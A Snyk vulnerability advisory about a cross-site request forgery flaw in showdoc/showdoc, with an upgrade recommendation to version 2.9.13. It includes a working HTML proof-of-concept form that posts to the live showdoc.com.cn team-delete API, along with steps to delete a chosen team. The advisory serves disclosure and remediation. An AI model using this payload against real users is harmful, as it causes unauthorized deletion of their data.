Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsLearn about Cross-site Request Forgery (CSRF) vulnerabilities in an interactive lesson.
Start learningUpgrade showdoc/showdoc to version 2.9.13 or higher.
showdoc/showdoc is a tool for an IT team to share documents online.
Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) via the cookie named PHPSESSID which doesn't have strict flag.
###POC:
1.replace 38046 with the team id
2.open poc.html and click on submit button.
3.after that the team with id 38046 or your replaced team id will be deleted.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
<input type="hidden" name="id" value="38046" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>